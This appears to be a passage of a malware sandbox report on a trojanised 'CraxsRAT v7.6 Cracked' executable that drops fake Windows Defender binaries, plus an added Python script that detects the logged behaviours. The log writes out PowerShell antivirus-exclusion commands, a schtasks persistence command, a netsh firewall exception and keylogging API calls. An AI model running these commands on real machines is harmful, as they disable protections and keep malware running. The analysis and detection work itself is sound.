Source: CraxsRat.exe, 00000004.00000000.2193397562.0000020F1C612000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: Xd7tzkf+YnhJ41oCfrvmCIddPnBdH2cln/54W/tFdOkVD53hJX6r/Ax9UM5zBiCcu924bPnuarlS
Source: CraxsRAT v7.6 Cracked.exe, 00000000.00000002.2508664015.000000000B971000.00000004.00000800.00020000.00000000.sdmp, CraxsRat.exe, 00000004.00000000.2193397562.0000020F1C612000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: orGZS/ElwmQgWtsE4+g7aNV9LPOJ7GB5nAT8FOHgFSFlQVGL+o4meGHNgBvAuO6za7bux5bHCqJ5
Source: CraxsRat.exe, 00000004.00000000.2193397562.0000020F1D012000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: HAxdT8A0DHihW1CfT909Vugky1knpRlFS6fHMeWDQ++9nxf5UCBIlQX/MGDrMUmBsbTuSCwQJbcF
Source: CraxsRAT v7.6 Cracked.exe, 00000000.00000002.2508664015.000000000B971000.00000004.00000800.00020000.00000000.sdmp, CraxsRat.exe, 00000004.00000000.2193397562.0000020F1C612000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: Mz7AgPEJVab3T3wggQAVu5OwdqLHHV5EEve6Wm8GS5NlVjkHmQDkDLfVpKZq53HgfsXtKBaH+QZA
Source: CraxsRat.exe, 00000004.00000000.2193397562.0000020F1D012000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: w0lyngvPP2yWdkRpvmCIFWo0WZB40kEMYz8/8fJK4M9AKWzMwH48gsjFEfXI8PHsltUTHOrk25o1
Source: CraxsRat.exe, 00000004.00000000.2193397562.0000020F1C612000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: m7iDErpFR5XIY/hhECGlQX+yfRy98F3cHHd0J9Pb8+PuwfLhQGXAVxRmXW70qvmCi3xauxUvFRYH
Source: CraxsRAT v7.6 Cracked.exe, 00000000.00000002.2508664015.000000000B971000.00000004.00000800.00020000.00000000.sdmp, CraxsRat.exe, 00000004.00000000.2193397562.0000020F1C612000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: exSU40Pq+ak9IUWnDdd+8exJK/EoPlm4WiDYhNIB+WJUdafUGpg/WaBQEmUW8DJ4lCkzwMhDWPlO
Source: CraxsRat.exe, 00000004.00000000.2193397562.0000020F1D012000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: 404MYBcp7Wyfz9MxMmbz3B9ix6xt08vmcI+Af4Gl6aZKnfO1qaD2wtU6/ICqXbKnHNA7DFKvAj0R
Source: CraxsRAT v7.6 Cracked.exe, 00000000.00000002.2508664015.000000000C371000.00000004.00000800.00020000.00000000.sdmp, CraxsRat.exe, 00000004.00000000.2193397562.0000020F1D012000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: bcuYPNIdayzcwIFv5DWKZhJfVOYk8DxHRwJS2SosJlKBX4G6o5B1s7oKkrqEmutFBIwJJHDSZhUm
Source: CraxsRat.exe, 00000004.00000000.2193397562.0000020F1D012000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: tYcWIjYXY0HJ4ki46tgcKizCwIdU4ULjQXRO9d3I86dvmCiqB8krVyjYlYv9jbdd95TsqArEvNZ3
Source: CraxsRAT v7.6 Cracked.exe, 00000000.00000002.2508664015.000000000B971000.00000004.00000800.00020000.00000000.sdmp, CraxsRat.exe, 00000004.00000000.2193397562.0000020F1C612000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: 3iiAvtSozcaRvWNQdbGKSL0dAhBHGFSWFbqOYeTWwVNL8d7M6jbIzdmtXHD7mGBnvpGoHw8oaWAO
Source: CraxsRAT v7.6 Cracked.exe, 00000000.00000002.2508664015.000000000B971000.00000004.00000800.00020000.00000000.sdmp, CraxsRat.exe, 00000004.00000000.2193397562.0000020F1C612000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: 64CJCukzQR9vu/OTVD8sbeCkhY5Q/hgFStHqVIA7vRsjht3DLUrMAI7ld1x6Nxcf/zDezF54rWdU
Source: CraxsRat.exe, 00000004.00000000.2193397562.0000020F1C612000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: NELz7igb5bBWFXvMCirWY+bcTkqlKhs9CzVUG2rFukoG+bplwvpm53+mqAhGLpb2Mtv88oyBN83m
Source: CraxsRat.exe, 00000004.00000000.2193397562.0000020F1C612000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: Wr8Tr69FDedKdnfHQ59zd82MisZFwCAE9qZotz/epkNbuK4TfC0MYYKHIjc3naqVdG/TAHfvmCIZ
Source: CraxsRAT v7.6 Cracked.exe, 00000000.00000002.2508664015.000000000B971000.00000004.00000800.00020000.00000000.sdmp, CraxsRat.exe, 00000004.00000000.2193397562.0000020F1C612000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: yaeOd3ob8h4DbMdlPyPp7a7bUB/tLW2LAuI8zWBdEAf9eSI4OQeMU7xgDQoz4K0M1HCa1vaEm5Ec
Source: CraxsRAT v7.6 Cracked.exe, 00000000.00000002.2508664015.000000000C371000.00000004.00000800.00020000.00000000.sdmp, CraxsRat.exe, 00000004.00000000.2193397562.0000020F1D012000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: NJtD3kQVqSrqEMuguQbDw+OlZEu5LP3QwdvRE1ItZW2gIZPOyD/aRvfVccM0Ai5NcsZapCmNz7t5
Source: CraxsRat.exe, 00000004.00000000.2193397562.0000020F1D012000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: lnnTUrbwq/Mib16r/zzyVMci2kG4hMtqBOyeFC+cQlx9o7pVSQU8kH8onVCdtbj7AM7+mI2o5uWl
Source: CraxsRat.exe, 00000004.00000000.2193397562.0000020F1D012000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: 7H+3SiHp1VmcIoj2x0PnuQW0c8dCW2VOwMUQxb+jysHlQfeh44BD8u0nN2avBIvnJS3QbJHAdS6j
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: Windows Defender Real Time Protection.exe.0.dr, kl.cs Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
Source: Windows Defender Real Time Protection.exe.0.dr, kl.cs Reference to suspicious API methods: GetAsyncKeyState(num2)
Source: Windows Defender Real Time Protection.exe.0.dr, OK.cs Reference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, 100, ref lpszVer, 100)
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe'
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Windows Defender Notification.exe'
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe Process created: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe "C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe"
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe Process created: C:\Users\user\AppData\Local\Temp\CraxsRat.exe "C:\Users\user\AppData\Local\Temp\CraxsRat.exe"
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe Process created: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe "C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe"
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Defender Notification.exe'
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Defender Notification" /tr "C:\Users\user\AppData\Roaming\Windows Defender Notification.exe"
Source: Windows Defender Real Time Protection.exe, 00000002.00000002.4633722381.0000000002FF6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: Windows Defender Real Time Protection.exe, 00000002.00000002.4633722381.0000000002FF6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Managerp
Source: Windows Defender Real Time Protection.exe, 00000002.00000002.4633722381.0000000002FF6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager@9
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\CraxsRat.exe VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe Queries volume information: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Registry value created: HKEY_CURRENT_USER\Environment SEE_MASK_NOZONECHECKS
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe" "Windows Defender Real Time Protection.exe" ENABLE
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe" "Windows Defender Real Time Protection.exe" ENABLE
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
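The three behaviours in this section (a legacy `netsh firewall add allowedprogram` exception for a binary under the user's Temp directory, SEE_MASK_NOZONECHECKS created under HKCU\Environment, and WMI enumeration of AntivirusProduct in root\SecurityCenter2) are the events a responder hunts for in process-creation, registry and WMI telemetry. The following Python is an added triage example, not part of the Joe Sandbox report or of the sample's code; the event-record layout, field names and sample records are constructed to mirror the lines above, and the firewall check goes beyond the report by also parsing the modern `netsh advfirewall` rule syntax (an assumption, not something the report shows).

```python
"""Added triage example: flag the defence-lowering events listed above.

Not part of the Joe Sandbox report. Event records are constructed dicts
modelled on the report's behaviour lines; real telemetry (Sysmon event 1/13,
Security 4688, WMI activity tracing) would need a small adapter to this shape.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Paths a legitimate firewall exception almost never points at: the report's
# sample whitelists a binary under %LOCALAPPDATA%\Temp.
USER_WRITABLE = re.compile(
    r"^[a-z]:\\users\\[^\\]+\\appdata\\(?:local\\temp|roaming)\\", re.IGNORECASE
)

# Legacy context used by the sample:
#   netsh firewall add allowedprogram [program=]<path> [name=]<name> [mode=]ENABLE
LEGACY_ALLOWEDPROGRAM = re.compile(
    r'netsh(?:\.exe)?\s+firewall\s+add\s+allowedprogram\s+(?:program=)?'
    r'(?:"(?P<qpath>[^"]+)"|(?P<upath>\S+))',
    re.IGNORECASE,
)

# Modern equivalent (assumed, not seen in the report), so one check covers both:
#   netsh advfirewall firewall add rule ... program=<path> ...
ADVFIREWALL_RULE = re.compile(
    r'netsh(?:\.exe)?\s+advfirewall\s+firewall\s+add\s+rule\b.*?\bprogram='
    r'(?:"(?P<qpath>[^"]+)"|(?P<upath>\S+))',
    re.IGNORECASE,
)


@dataclass(frozen=True)
class Finding:
    technique: str
    detail: str


def firewall_exception_path(cmdline: str) -> str | None:
    """Return the program path a netsh command whitelists, or None."""
    match = LEGACY_ALLOWEDPROGRAM.search(cmdline) or ADVFIREWALL_RULE.search(cmdline)
    if match is None:
        return None
    return match.group("qpath") or match.group("upath")


def triage(events: list[dict]) -> list[Finding]:
    """Map constructed event records onto the three behaviours the report lists."""
    findings: list[Finding] = []
    for ev in events:
        if ev["type"] == "process":
            path = firewall_exception_path(ev["cmdline"])
            if path and USER_WRITABLE.search(path):
                findings.append(Finding("firewall_exception_user_writable", path))
        elif ev["type"] == "registry":
            # Setting this variable suppresses the "Open File - Security Warning"
            # zone check for files launched via the shell; a per-user entry under
            # HKCU\Environment is enough, no admin rights needed.
            if (ev["key"].lower().endswith("\\environment")
                    and ev["value"].upper() == "SEE_MASK_NOZONECHECKS"):
                findings.append(Finding("zone_check_disabled",
                                        f"{ev['key']}\\{ev['value']}={ev['data']}"))
        elif ev["type"] == "wmi":
            # Enumerating registered AV products before deciding how to evade them.
            if (ev["namespace"].lower() == r"root\securitycenter2"
                    and "antivirusproduct" in ev["query"].lower()):
                findings.append(Finding("av_enumeration", ev["query"]))
    return findings


# Constructed sample telemetry mirroring the report's lines, plus benign noise.
# The registry data value "1" is assumed; the report line does not show it.
SAMPLE_EVENTS = [
    {"type": "process",
     "cmdline": r'netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe" "Windows Defender Real Time Protection.exe" ENABLE'},
    {"type": "registry", "key": r"HKEY_CURRENT_USER\Environment",
     "value": "SEE_MASK_NOZONECHECKS", "data": "1"},
    {"type": "wmi", "namespace": r"root\SecurityCenter2",
     "query": "Select * from AntivirusProduct"},
    {"type": "process",  # benign: installer whitelisting a Program Files binary
     "cmdline": r'netsh advfirewall firewall add rule name="App" dir=in action=allow program="C:\Program Files\App\app.exe" enable=yes'},
    {"type": "registry", "key": r"HKEY_CURRENT_USER\Environment",
     "value": "TEMP", "data": r"%USERPROFILE%\AppData\Local\Temp"},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(f"{finding.technique:35} {finding.detail}")
```

Two points worth keeping in mind when turning this into a real rule: the `netsh firewall` context is deprecated in favour of `netsh advfirewall` but is still accepted, which is why it keeps appearing in current samples, and the report shows it launched from C:\Windows\SysWOW64\netsh.exe, i.e. by a 32-bit parent process, so a rule keyed only on the System32 path would miss it. The AntivirusProduct query is also issued by legitimate inventory tooling, so it is a corroborating signal rather than a standalone alert.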

Stealing of Sensitive Information

Source: Yara match File source: 2.0.Windows Defender Real Time Protection.exe.a30000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000000.2145187329.0000000000A32000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2500469430.00000000082E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.4633722381.0000000002FF6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0e75fed00639ea9e725255499292dcdd.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe, type: DROPPED
Source: Yara match File source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.Windows Defender Notification.exe.410000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000000.2480522494.0000000000412000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2500469430.00000000082E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
